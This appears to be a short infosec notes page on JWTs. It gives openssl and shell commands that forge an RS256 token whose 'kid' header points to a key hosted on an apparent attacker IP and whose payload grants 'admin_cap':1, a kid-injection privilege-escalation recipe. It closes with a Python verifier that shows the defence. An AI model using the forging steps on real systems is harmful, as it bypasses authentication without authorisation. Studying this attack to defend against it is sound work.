akde/infosec

Information security is ultimately about managing risk


  • Use https://jwt.io/ to decode a JWT
    • It also shows the various parts. A JWT consists of multiple base64-encoded (URL-safe variant) parts separated by a dot ('.') character.

Create JWT token

Create an RSA private key in PEM format:

openssl genrsa -out private.pem 2048

Create base64url from header and payload:

$ echo -n '{"typ":"JWT","alg":"RS256","kid":"http://10.10.14.17/private.pem"}' | base64 -w0 | tr -- '+/' '-_' | sed -E 's/=+$//'
=> $header
$ echo -n '{"username":"aaa","email":"a@a.a","admin_cap":1}' | base64 -w0 | tr -- '+/' '-_' | sed -E 's/=+$//'
=> $payload

Create the signature with the private key created above:

echo -n "$header.$payload" | openssl dgst -sha256 -binary -sign private.pem | openssl enc -base64 | tr -d '\n=' | tr -- '+/' '-_'
=> $sig

Now combine all parts into the JWT token:

$header.$payload.$sig

You can verify this JWT token e.g. via https://jwt.io/.
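The same base64url encoding and dot-joined structure, seen from the side that accepts a token, as an added example that is not part of these notes. It uses Python's stdlib HMAC (HS256) instead of the RS256/openssl signing above so it runs without extra libraries; the key store, secret and kid values are constructed for the demo. The point is that a verifier resolves `kid` only against its own key store and `alg` only against a server-side allowlist, so a token whose kid names a URL like the one in the header above is rejected, never fetched.

```python
import base64
import hashlib
import hmac
import json

def b64url_encode(data: bytes) -> str:
    # JWT uses the URL-safe alphabet ('-' and '_') with the '=' padding stripped
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def b64url_decode(text: str) -> bytes:
    # restore the stripped padding before decoding
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

# Constructed local key store: kid -> HMAC secret. The verifier resolves `kid`
# only against this dict; kid is an opaque lookup name, never a path or URL to fetch.
KEYS = {"k1": b"constructed-demo-secret-do-not-reuse"}

def sign_jwt(payload: dict, kid: str) -> str:
    header = {"typ": "JWT", "alg": "HS256", "kid": kid}
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(KEYS[kid], f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"

def verify_jwt(token: str, allowed_algs=("HS256",)) -> dict:
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("JWT must have exactly three dot-separated parts")
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    # the accepted algorithm comes from the verifier's allowlist, not from the token:
    # this rejects "none" and any algorithm the server never intended to accept
    if header.get("alg") not in allowed_algs:
        raise ValueError(f"alg {header.get('alg')!r} not allowed")
    kid = header.get("kid")
    if not isinstance(kid, str) or kid not in KEYS:
        raise ValueError(f"unknown kid {kid!r}")
    expected = hmac.new(KEYS[kid], f"{h}.{p}".encode(), hashlib.sha256).digest()
    # constant-time comparison of the signature over the exact header.payload bytes
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("signature mismatch")
    return json.loads(b64url_decode(p))

def is_valid(token: str) -> bool:
    try:
        verify_jwt(token)
        return True
    except (ValueError, UnicodeDecodeError):
        return False
```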
